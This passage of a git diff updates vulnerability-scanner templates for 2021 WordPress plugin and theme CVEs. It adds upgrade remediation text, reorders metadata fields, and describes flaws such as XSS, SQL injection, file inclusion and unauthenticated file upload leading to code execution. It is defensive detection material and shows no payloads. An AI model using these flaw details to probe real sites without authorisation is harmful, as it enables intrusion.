--- a/http/cves/2021/CVE-2021-24226.yaml +++ b/http/cves/2021/CVE-2021-24226.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: high description: WordPress AccessAlly plugin before 3.5.7 allows sensitive information leakage because the file \"resource/frontend/product/product-shortcode.php\" (which is responsible for the [accessally_order_form] shortcode) dumps serialize($_SERVER), which contains all environment variables. The leakage occurs on all public facing pages containing the [accessally_order_form] shortcode, and no login or administrator role is required. + remediation: | + Upgrade AccessAlly to version 3.5.7 or higher to fix the vulnerability. reference: - https://wpscan.com/vulnerability/8e3e89fd-e380-4108-be23-00e87fbaad16 - https://nvd.nist.gov/vuln/detail/CVE-2021-24226 @@ -14,13 +16,13 @@ info: cve-id: CVE-2021-24226 cwe-id: CWE-200 epss-score: 0.03501 - cpe: cpe:2.3:a:accessally:accessally:*:*:*:*:*:wordpress:*:* epss-percentile: 0.90323 + cpe: cpe:2.3:a:accessally:accessally:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: accessally product: accessally + framework: wordpress tags: wordpress,cve,cve2021,wp-plugin,wpscan http: diff --git a/http/cves/2021/CVE-2021-24227.yaml b/http/cves/2021/CVE-2021-24227.yaml index b5141b55f4..e48d39a4a2 100644 --- a/http/cves/2021/CVE-2021-24227.yaml +++ b/http/cves/2021/CVE-2021-24227.yaml @@ -5,6 +5,8 @@ info: author: theamanrawat severity: high description: Patreon WordPress before version 1.7.0 is vulnerable to unauthenticated local file inclusion that could be abused by anyone visiting the site. Exploitation by an attacker could leak important internal files like wp-config.php, which contains database credentials and cryptographic keys used in the generation of nonces and cookies. + remediation: | + Upgrade to Patreon WordPress plugin version 1.7.0 or later to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/f62df02d-7678-440f-84a1-ddbf09364016 - https://wordpress.org/plugins/patreon-connect/ @@ -16,13 +18,13 @@ info: cve-id: CVE-2021-24227 cwe-id: CWE-200 epss-score: 0.03493 - cpe: cpe:2.3:a:patreon:patreon_wordpress:*:*:*:*:*:wordpress:*:* epss-percentile: 0.90307 + cpe: cpe:2.3:a:patreon:patreon_wordpress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: patreon product: patreon_wordpress + framework: wordpress tags: wordpress,patreon-connect,unauth,cve2021,lfi,patreon,wp,wpscan,cve http: diff --git a/http/cves/2021/CVE-2021-24235.yaml b/http/cves/2021/CVE-2021-24235.yaml index a908b8bcb1..02e42fcaf7 100644 --- a/http/cves/2021/CVE-2021-24235.yaml +++ b/http/cves/2021/CVE-2021-24235.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Goto Tour & Travel theme before 2.0 contains an unauthenticated reflected cross-site scripting vulnerability. It does not sanitize the keywords and start_date GET parameters on its Tour List page. + remediation: | + Update to the latest version of the WordPress Goto Tour & Travel Theme (>=2.0) to mitigate the XSS vulnerability. reference: - https://wpscan.com/vulnerability/eece90aa-582b-4c49-8b7c-14027f9df139 - https://m0ze.ru/vulnerability/[2021-02-10]-[WordPress]-[CWE-79]-Goto-WordPress-Theme-v1.9.txt @@ -15,13 +17,13 @@ info: cve-id: CVE-2021-24235 cwe-id: CWE-79 epss-score: 0.00116 - cpe: cpe:2.3:a:boostifythemes:goto:*:*:*:*:*:wordpress:*:* epss-percentile: 0.44609 + cpe: cpe:2.3:a:boostifythemes:goto:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: boostifythemes product: goto + framework: wordpress tags: xss,wp-theme,wpscan,cve,cve2021,wordpress http: diff --git a/http/cves/2021/CVE-2021-24236.yaml b/http/cves/2021/CVE-2021-24236.yaml index fdd12bda7f..8eaca4cb3c 100644 --- a/http/cves/2021/CVE-2021-24236.yaml +++ b/http/cves/2021/CVE-2021-24236.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Imagements plugin through 1.2.5 is susceptible to arbitrary file upload which can lead to remote code execution. The plugin allows images to be uploaded in comments but only checks for the Content-Type in the request to forbid dangerous files. An attacker can upload arbitrary files by using a valid image Content-Type along with a PHP filename and code. + remediation: | + Update WordPress Imagements plugin to version 1.2.6 or later to fix the arbitrary file upload vulnerability. reference: - https://wpscan.com/vulnerability/8f24e74f-60e3-4100-9ab2-ec31b9c9cdea - https://wordpress.org/plugins/imagements/ @@ -17,13 +19,13 @@ info: cve-id: "CVE-2021-24236" cwe-id: CWE-434 epss-score: 0.14539 - cpe: cpe:2.3:a:imagements_project:imagements:*:*:*:*:*:wordpress:*:* epss-percentile: 0.95043 + cpe: cpe:2.3:a:imagements_project:imagements:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: imagements_project product: imagements + framework: wordpress tags: cve,wp,unauth,imagements,wpscan,cve2021,fileupload,wordpress,wp-plugin,intrusive variables: php: "{{to_lower('{{randstr}}')}}.php" diff --git a/http/cves/2021/CVE-2021-24237.yaml b/http/cves/2021/CVE-2021-24237.yaml index 7cf3616d70..c1241ceb60 100644 --- a/http/cves/2021/CVE-2021-24237.yaml +++ b/http/cves/2021/CVE-2021-24237.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: WordPress Realteo plugin 1.2.3 and prior contains an unauthenticated reflected cross-site scripting vulnerability due to improper sanitization of keyword_search, search_radius. _bedrooms and _bathrooms GET parameters before outputting them in its properties page. + remediation: | + Update to the latest version of the WordPress Realteo plugin (>=1.2.4) which includes a fix for the Cross-Site Scripting vulnerability. reference: - https://wpscan.com/vulnerability/087b27c4-289e-410f-af74-828a608a4e1e - https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt @@ -17,13 +19,13 @@ info: cve-id: CVE-2021-24237 cwe-id: CWE-79 epss-score: 0.00284 - cpe: cpe:2.3:a:purethemes:findeo:*:*:*:*:*:wordpress:*:* epss-percentile: 0.64615 + cpe: cpe:2.3:a:purethemes:findeo:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: purethemes product: findeo + framework: wordpress tags: cve,cve2021,realteo,xss,wordpress,plugin,wpscan,intrusive http: diff --git a/http/cves/2021/CVE-2021-24239.yaml b/http/cves/2021/CVE-2021-24239.yaml index 378b29a0f5..a1ce3a566d 100644 --- a/http/cves/2021/CVE-2021-24239.yaml +++ b/http/cves/2021/CVE-2021-24239.yaml @@ -6,25 +6,25 @@ info: severity: medium description: | WordPress Pie Register plugin before 3.7.0.1 is susceptible to cross-site scripting. The plugin does not sanitize the invitaion_code GET parameter when outputting it in the Activation Code page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: Fixed in version 3.7.0.1. reference: - https://wpscan.com/vulnerability/f1b67f40-642f-451e-a67a-b7487918ee34 - https://plugins.trac.wordpress.org/changeset/2507536/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24239 - remediation: Fixed in version 3.7.0.1. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24239 cwe-id: CWE-79 epss-score: 0.00116 - cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* epss-percentile: 0.44596 + cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: genetechsolutions product: pie_register + framework: wordpress tags: cve,cve2021,xss,pie-register,wp,wpscan http: diff --git a/http/cves/2021/CVE-2021-24245.yaml b/http/cves/2021/CVE-2021-24245.yaml index c340a16307..d9810e8d46 100644 --- a/http/cves/2021/CVE-2021-24245.yaml +++ b/http/cves/2021/CVE-2021-24245.yaml @@ -5,6 +5,8 @@ info: author: edoardottt severity: medium description: WordPress Stop Spammers plugin before 2021.9 contains a reflected cross-site scripting vulnerability. It does not escape user input when blocking requests (such as matching a spam word), thus outputting it in an attribute after sanitizing it to remove HTML tags. + remediation: | + Update to the latest version of the WordPress Stop Spammers plugin (2021.9 or later) to mitigate this vulnerability. reference: - https://packetstormsecurity.com/files/162623/WordPress-Stop-Spammers-2021.8-Cross-Site-Scripting.html - https://wpscan.com/vulnerability/5e7accd6-08dc-4c6e-9d19-73e2d7e97735 @@ -16,13 +18,13 @@ info: cve-id: CVE-2021-24245 cwe-id: CWE-79 epss-score: 0.00177 - cpe: cpe:2.3:a:trumani:stop_spammers:*:*:*:*:*:wordpress:*:* epss-percentile: 0.54153 + cpe: cpe:2.3:a:trumani:stop_spammers:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: trumani product: stop_spammers + framework: wordpress tags: wpscan,cve,cve2021,wordpress,xss,wp-plugin,packetstorm http: diff --git a/http/cves/2021/CVE-2021-24274.yaml b/http/cves/2021/CVE-2021-24274.yaml index 53e3d49b93..a5c60f4bc9 100644 --- a/http/cves/2021/CVE-2021-24274.yaml +++ b/http/cves/2021/CVE-2021-24274.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: WordPress Supsystic Ultimate Maps plugin before 1.2.5 contains an unauthenticated reflected cross-site scripting vulnerability due to improper sanitization of the tab parameter on the options page before outputting it in an attribute. + remediation: | + Update the WordPress Supsystic Ultimate Maps plugin to version 1.2.5 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/200a3031-7c42-4189-96b1-bed9e0ab7c1d - http://packetstormsecurity.com/files/164316/WordPress-Ultimate-Maps-1.2.4-Cross-Site-Scripting.html @@ -15,13 +17,13 @@ info: cve-id: CVE-2021-24274 cwe-id: CWE-79 epss-score: 0.00147 - cpe: cpe:2.3:a:supsystic:ultimate_maps:*:*:*:*:*:wordpress:*:* epss-percentile: 0.50047 + cpe: cpe:2.3:a:supsystic:ultimate_maps:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: supsystic product: ultimate_maps + framework: wordpress tags: wpscan,packetstorm,wordpress,cve,cve2021,wp-plugin,maps http: diff --git a/http/cves/2021/CVE-2021-24275.yaml b/http/cves/2021/CVE-2021-24275.yaml index e046003663..5859613a95 100644 --- a/http/cves/2021/CVE-2021-24275.yaml +++ b/http/cves/2021/CVE-2021-24275.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: WordPress Popup by Supsystic before 1.10.5 did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected cross-site scripting issue. + remediation: | + Upgrade to Popup by Supsystic version 1.10.5 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/efdc76e0-c14a-4baf-af70-9d381107308f - http://packetstormsecurity.com/files/164311/WordPress-Popup-1.10.4-Cross-Site-Scripting.html @@ -15,13 +17,13 @@ info: cve-id: CVE-2021-24275 cwe-id: CWE-79 epss-score: 0.00177 - cpe: cpe:2.3:a:supsystic:popup:*:*:*:*:*:wordpress:*:* epss-percentile: 0.54153 + cpe: cpe:2.3:a:supsystic:popup:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: supsystic product: popup + framework: wordpress tags: wpscan,packetstorm,wordpress,cve,cve2021,wp-plugin http: diff --git a/http/cves/2021/CVE-2021-24276.yaml b/http/cves/2021/CVE-2021-24276.yaml index 6a386ff5f3..226854055d 100644 --- a/http/cves/2021/CVE-2021-24276.yaml +++ b/http/cves/2021/CVE-2021-24276.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: WordPress Supsystic Contact Form plugin before 1.7.15 contains a cross-site scripting vulnerability. It does not sanitize the tab parameter of its options page before outputting it in an attribute. + remediation: | + Update to the latest version of the WordPress Supsystic Contact Form plugin (1.7.15 or higher) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/1301123c-5e63-432a-ab90-3221ca532d9c - http://packetstormsecurity.com/files/164308/WordPress-Contact-Form-1.7.14-Cross-Site-Scripting.html @@ -15,13 +17,13 @@ info: cve-id: CVE-2021-24276 cwe-id: CWE-79 epss-score: 0.00177 - cpe: cpe:2.3:a:supsystic:contact_form:*:*:*:*:*:wordpress:*:* epss-percentile: 0.54153 + cpe: cpe:2.3:a:supsystic:contact_form:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: supsystic product: contact_form + framework: wordpress tags: wordpress,cve,cve2021,wp-plugin,wpscan,packetstorm http: diff --git a/http/cves/2021/CVE-2021-24278.yaml b/http/cves/2021/CVE-2021-24278.yaml index 8ffb0fa7bb..842ae5ba1b 100644 --- a/http/cves/2021/CVE-2021-24278.yaml +++ b/http/cves/2021/CVE-2021-24278.yaml @@ -5,6 +5,8 @@ info: author: 2rs3c severity: high description: WordPress Contact Form 7 before version 2.3.4 allows unauthenticated users to use the wpcf7r_get_nonce AJAX action to retrieve a valid nonce for any WordPress action/function. + remediation: | + Update WordPress Contact Form 7 plugin to version 2.3.4 or later to fix the Arbitrary Nonce Generation vulnerability. reference: - https://wpscan.com/vulnerability/99f30604-d62b-4e30-afcd-b482f8d66413 - https://www.wordfence.com/blog/2021/04/severe-vulnerabilities-patched-in-redirection-for-contact-form-7-plugin/ @@ -15,13 +17,13 @@ info: cve-id: CVE-2021-24278 cwe-id: CWE-863 epss-score: 0.07444 - cpe: cpe:2.3:a:querysol:redirection_for_contact_form_7:*:*:*:*:*:wordpress:*:* epss-percentile: 0.9325 + cpe: cpe:2.3:a:querysol:redirection_for_contact_form_7:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: querysol product: redirection_for_contact_form_7 + framework: wordpress tags: wordpress,wp-plugin,wpscan,cve,cve2021 http: diff --git a/http/cves/2021/CVE-2021-24284.yaml b/http/cves/2021/CVE-2021-24284.yaml index 03db28e502..c26b8abaf6 100644 --- a/http/cves/2021/CVE-2021-24284.yaml +++ b/http/cves/2021/CVE-2021-24284.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Kaswara Modern VC Addons plugin through 3.0.1 is susceptible to an arbitrary file upload. The plugin allows unauthenticated arbitrary file upload via the uploadFontIcon AJAX action, which can be used to obtain code execution. The supplied zipfile is unzipped in the wp-content/uploads/kaswara/fonts_icon directory with no checks for malicious files such as PHP. + remediation: | + Update to the latest version of Kaswara Modern VC Addons plugin (>=3.0.2) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/8d66e338-a88f-4610-8d12-43e8be2da8c5 - https://github.com/advisories/GHSA-wqvg-8q49-hjc7 @@ -19,13 +21,13 @@ info: cve-id: CVE-2021-24284 cwe-id: CWE-434 epss-score: 0.96885 - cpe: cpe:2.3:a:kaswara_project:kaswara:*:*:*:*:*:wordpress:*:* epss-percentile: 0.99579 + cpe: cpe:2.3:a:kaswara_project:kaswara:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: kaswara_project product: kaswara + framework: wordpress tags: intrusive,unauth,fileupload,wpscan,cve,wordpress,wp-plugin,rce,cve2021,wp variables: zip_file: "{{to_lower(rand_text_alpha(6))}}" diff --git a/http/cves/2021/CVE-2021-24285.yaml b/http/cves/2021/CVE-2021-24285.yaml index f6261cda0f..d9d99e9036 100644 --- a/http/cves/2021/CVE-2021-24285.yaml +++ b/http/cves/2021/CVE-2021-24285.yaml @@ -5,6 +5,8 @@ info: author: ShreyaPohekar severity: critical description: The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitize, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL injection issue. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in the WordPress Car Seller - Auto Classifieds Script. reference: - https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/ - https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162 @@ -15,13 +17,13 @@ info: cve-id: CVE-2021-24285 cwe-id: CWE-89 epss-score: 0.12049 - cpe: cpe:2.3:a:cars-seller-auto-classifieds-script_project:cars-seller-auto-classifieds-script:*:*:*:*:*:wordpress:*:* epss-percentile: 0.94624 + cpe: cpe:2.3:a:cars-seller-auto-classifieds-script_project:cars-seller-auto-classifieds-script:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: cars-seller-auto-classifieds-script_project product: cars-seller-auto-classifieds-script + framework: wordpress tags: cve2021,wordpress,wp-plugin,sqli,wpscan,cve http: diff --git a/http/cves/2021/CVE-2021-24287.yaml b/http/cves/2021/CVE-2021-24287.yaml index 0cffaa9100..737f6bdc1a 100644 --- a/http/cves/2021/CVE-2021-24287.yaml +++ b/http/cves/2021/CVE-2021-24287.yaml @@ -6,26 +6,26 @@ info: severity: medium description: | WordPress Select All Categories and Taxonomies plugin before 1.3.2 contains a cross-site scripting vulnerability. The settings page of the plugin does not properly sanitize the tab parameter before outputting it back. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: Fixed in version 1.3.2. reference: - https://www.exploit-db.com/exploits/50349 - https://wpscan.com/vulnerability/56e1bb56-bfc5-40dd-b2d0-edef43d89bdf - https://wordpress.org/plugins/select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24287 - remediation: Fixed in version 1.3.2. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24287 cwe-id: CWE-79 epss-score: 0.00177 - cpe: cpe:2.3:a:mooveagency:select_all_categories_and_taxonomies\,_change_checkbox_to_radio_buttons:*:*:*:*:*:wordpress:*:* epss-percentile: 0.54153 + cpe: cpe:2.3:a:mooveagency:select_all_categories_and_taxonomies\,_change_checkbox_to_radio_buttons:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: mooveagency product: select_all_categories_and_taxonomies\,_change_checkbox_to_radio_buttons + framework: wordpress tags: wp,select-all-categories,taxonomies-change-checkbox-to-radio-buttons,authenticated,wpscan,cve2021,xss,wp-plugin,cve,wordpress,edb http: diff --git a/http/cves/2021/CVE-2021-24288.yaml b/http/cves/2021/CVE-2021-24288.yaml index 48a45fbbf5..113674866d 100644 --- a/http/cves/2021/CVE-2021-24288.yaml +++ b/http/cves/2021/CVE-2021-24288.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: WordPress AcyMailing plugin before 7.5.0 contains an open redirect vulnerability due to improper sanitization of the redirect parameter. An attacker turning the request from POST to GET can craft a link containing a potentially malicious landing page and send it to the user. + remediation: | + Update the AcyMailing plugin to version 7.5.0 or later to fix the open redirect vulnerability. reference: - https://wpscan.com/vulnerability/56628862-1687-4862-9ed4-145d8dfbca97 - https://nvd.nist.gov/vuln/detail/CVE-2021-24288 @@ -14,13 +16,13 @@ info: cve-id: CVE-2021-24288 cwe-id: CWE-601 epss-score: 0.0015 - cpe: cpe:2.3:a:acymailing:acymailing:*:*:*:*:*:wordpress:*:* epss-percentile: 0.50525 + cpe: cpe:2.3:a:acymailing:acymailing:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: acymailing product: acymailing + framework: wordpress tags: wpscan,wordpress,cve,cve2021,redirect,wp-plugin http: diff --git a/http/cves/2021/CVE-2021-24291.yaml b/http/cves/2021/CVE-2021-24291.yaml index 209ac4959b..02aa67a1a6 100644 --- a/http/cves/2021/CVE-2021-24291.yaml +++ b/http/cves/2021/CVE-2021-24291.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Photo Gallery by 10Web plugin before 1.5.69 contains multiple reflected cross-site scripting vulnerabilities via the gallery_id, tag, album_id and theme_id GET parameters passed to the bwg_frontend_data AJAX action, available to both unauthenticated and authenticated users. + remediation: | + Update WordPress Photo Gallery by 10Web to version 1.5.69 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/cfb982b2-8b6d-4345-b3ab-3d2b130b873a - https://packetstormsecurity.com/files/162227/ @@ -16,13 +18,13 @@ info: cve-id: CVE-2021-24291 cwe-id: CWE-79 epss-score: 0.00085 - cpe: cpe:2.3:a:10web:photo_gallery:*:*:*:*:*:wordpress:*:* epss-percentile: 0.35153 + cpe: cpe:2.3:a:10web:photo_gallery:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: 10web product: photo_gallery + framework: wordpress tags: photo,wpscan,packetstorm,cve,cve2021,xss,wordpress,wp-plugin http: diff --git a/http/cves/2021/CVE-2021-24298.yaml b/http/cves/2021/CVE-2021-24298.yaml index 2707d7a3cc..4068a35d34 100644 --- a/http/cves/2021/CVE-2021-24298.yaml +++ b/http/cves/2021/CVE-2021-24298.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Simple Giveaways plugin before 2.36.2 contains a cross-site scripting vulnerability via the method and share GET parameters of the Giveaway pages, which are not sanitized, validated, or escaped before being output back in the pages. + remediation: | + Update to the latest version of the WordPress Simple Giveaways plugin (2.36.2 or higher) to mitigate the vulnerability. reference: - https://codevigilant.com/disclosure/2021/wp-plugin-giveasap-xss/ - https://wpscan.com/vulnerability/30aebded-3eb3-4dda-90b5-12de5e622c91 @@ -16,13 +18,13 @@ info: cve-id: CVE-2021-24298 cwe-id: CWE-79 epss-score: 0.00116 - cpe: cpe:2.3:a:ibenic:simple_giveaways:*:*:*:*:*:wordpress:*:* epss-percentile: 0.44609 + cpe: cpe:2.3:a:ibenic:simple_giveaways:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: ibenic product: simple_giveaways + framework: wordpress tags: wpscan,cve,cve2021,wordpress,xss,wp-plugin http: diff --git a/http/cves/2021/CVE-2021-24300.yaml b/http/cves/2021/CVE-2021-24300.yaml index 39e61c7a4b..eff25ca295 100644 --- a/http/cves/2021/CVE-2021-24300.yaml +++ b/http/cves/2021/CVE-2021-24300.yaml @@ -5,6 +5,8 @@ info: author: cckuailong severity: medium description: WordPress WooCommerce before 1.13.22 contains a reflected cross-site scripting vulnerability via the slider import search feature because it does not properly sanitize the keyword GET parameter. + remediation: | + Update WordPress WooCommerce plugin to version 1.13.22 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/5fbbc7ad-3f1a-48a1-b2eb-e57f153eb837 - https://nvd.nist.gov/vuln/detail/CVE-2021-24300 @@ -14,13 +16,13 @@ info: cve-id: CVE-2021-24300 cwe-id: CWE-79 epss-score: 0.00302 - cpe: cpe:2.3:a:pickplugins:product_slider_for_woocommerce:*:*:*:*:*:wordpress:*:* epss-percentile: 0.65712 + cpe: cpe:2.3:a:pickplugins:product_slider_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: pickplugins product: product_slider_for_woocommerce + framework: wordpress tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated,wpscan http: diff --git a/http/cves/2021/CVE-2021-24316.yaml b/http/cves/2021/CVE-2021-24316.yaml index 6fb3bc421f..322261952e 100644 --- a/http/cves/2021/CVE-2021-24316.yaml +++ b/http/cves/2021/CVE-2021-24316.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: WordPress Mediumish theme 1.0.47 and prior contains an unauthenticated reflected cross-site scripting vulnerability. The 's' GET parameter is not properly sanitized by the search feature before it is output back on the page. + remediation: | + Update to the latest version of the WordPress Mediumish Theme plugin (1.0.47 or higher) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e - https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt @@ -16,13 +18,13 @@ info: cve-id: CVE-2021-24316 cwe-id: CWE-79 epss-score: 0.00246 - cpe: cpe:2.3:a:wowthemes:mediumish:*:*:*:*:*:wordpress:*:* epss-percentile: 0.61827 + cpe: cpe:2.3:a:wowthemes:mediumish:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: wowthemes product: mediumish + framework: wordpress tags: cve,cve2021,mediumish,xss,wordpress,wpscan,intrusive http: diff --git a/http/cves/2021/CVE-2021-24320.yaml b/http/cves/2021/CVE-2021-24320.yaml index 1277647f35..381ff3bfae 100644 --- a/http/cves/2021/CVE-2021-24320.yaml +++ b/http/cves/2021/CVE-2021-24320.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Bello Directory & Listing theme before 1.6.0 contains a reflected cross-site scripting vulnerability. It does not properly sanitize and escape the listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameters in the ints listing page. + remediation: | + Update WordPress Bello Directory & Listing Theme to version 1.6.0 or later to mitigate the vulnerability. reference: - https://m0ze.ru/vulnerability/%5B2021-03-21%5D-%5BWordPress%5D-%5BCWE-79%5D-Bello-WordPress-Theme-v1.5.9.txt - https://wpscan.com/vulnerability/6b5b42fd-028a-4405-b027-3266058029bb @@ -15,13 +17,13 @@ info: cve-id: CVE-2021-24320 cwe-id: CWE-79 epss-score: 0.00116 - cpe: cpe:2.3:a:bold-themes:bello:*:*:*:*:*:wordpress:*:* epss-percentile: 0.44609 + cpe: cpe:2.3:a:bold-themes:bello:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: bold-themes product: bello + framework: wordpress tags: cve2021,wordpress,xss,wp-plugin,wpscan,cve http: diff --git a/http/cves/2021/CVE-2021-24335.yaml b/http/cves/2021/CVE-2021-24335.yaml index 5e3b56b329..a087310d9c 100644 --- a/http/cves/2021/CVE-2021-24335.yaml +++ b/http/cves/2021/CVE-2021-24335.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Car Repair Services & Auto Mechanic before 4.0 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the serviceestimatekey parameter before outputting it back in the page. + remediation: | + Update to the latest version of the WordPress Car Repair Services & Auto Mechanic Theme (version 4.0 or higher) to mitigate the XSS vulnerability. reference: - https://themeforest.net/item/car-repair-services-auto-mechanic-wordpress-theme/19823557 - https://m0ze.ru/vulnerability/[2021-02-12]-[WordPress]-[CWE-79]-Car-Repair-Services-WordPress-Theme-v3.9.txt @@ -16,13 +18,13 @@ info: cve-id: CVE-2021-24335 cwe-id: CWE-79 epss-score: 0.00163 - cpe: cpe:2.3:a:smartdatasoft:car_repair_services_\&_auto_mechanic:*:*:*:*:*:wordpress:*:* epss-percentile: 0.52284 + cpe: cpe:2.3:a:smartdatasoft:car_repair_services_\&_auto_mechanic:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: smartdatasoft product: car_repair_services_\&_auto_mechanic + framework: wordpress tags: cve,cve2021,wordpress,xss,wp-plugin,wpscan http: diff --git a/http/cves/2021/CVE-2021-24340.yaml b/http/cves/2021/CVE-2021-24340.yaml index 1ecd583719..5acce16868 100644 --- a/http/cves/2021/CVE-2021-24340.yaml +++ b/http/cves/2021/CVE-2021-24340.yaml @@ -5,6 +5,8 @@ info: author: lotusdll,j4vaovo severity: high description: WordPress Statistic plugin versions prior to version 13.0.8 are affected by an unauthenticated time-based blind SQL injection vulnerability. + remediation: | + Update to WordPress Statistics plugin version 13.0.8 or later to mitigate the vulnerability. reference: - https://www.exploit-db.com/exploits/49894 - https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/ @@ -17,13 +19,13 @@ info: cve-id: CVE-2021-24340 cwe-id: CWE-89 epss-score: 0.02665 - cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:wordpress:*:* epss-percentile: 0.89061 + cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: veronalabs product: wp_statistics + framework: wordpress tags: cve,wp-plugin,unauth,wpscan,cve2021,wordpress,sqli,blind,edb http: diff --git a/http/cves/2021/CVE-2021-24342.yaml b/http/cves/2021/CVE-2021-24342.yaml index 047b5b0cb0..1ff5552100 100644 --- a/http/cves/2021/CVE-2021-24342.yaml +++ b/http/cves/2021/CVE-2021-24342.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: WordPress JNews theme before 8.0.6 contains a reflected cross-site scripting vulnerability. It does not sanitize the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*). + remediation: | + Update to the latest version of the WordPress JNews Theme (>=8.0.6) to mitigate the XSS vulnerability. reference: - https://wpscan.com/vulnerability/415ca763-fe65-48cb-acd3-b375a400217e - https://nvd.nist.gov/vuln/detail/CVE-2021-24342 @@ -14,13 +16,13 @@ info: cve-id: CVE-2021-24342 cwe-id: CWE-79 epss-score: 0.00102 - cpe: cpe:2.3:a:jnews:jnews:*:*:*:*:*:wordpress:*:* epss-percentile: 0.40864 + cpe: cpe:2.3:a:jnews:jnews:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: jnews product: jnews + framework: wordpress tags: cve2021,wordpress,xss,wp-plugin,wpscan,cve http: diff --git a/http/cves/2021/CVE-2021-24347.yaml b/http/cves/2021/CVE-2021-24347.yaml index c8065cd207..ad79aa05bd 100644 --- a/http/cves/2021/CVE-2021-24347.yaml +++ b/http/cves/2021/CVE-2021-24347.yaml @@ -6,26 +6,26 @@ info: severity: high description: | WordPress SP Project & Document Manager plugin before 4.22 is 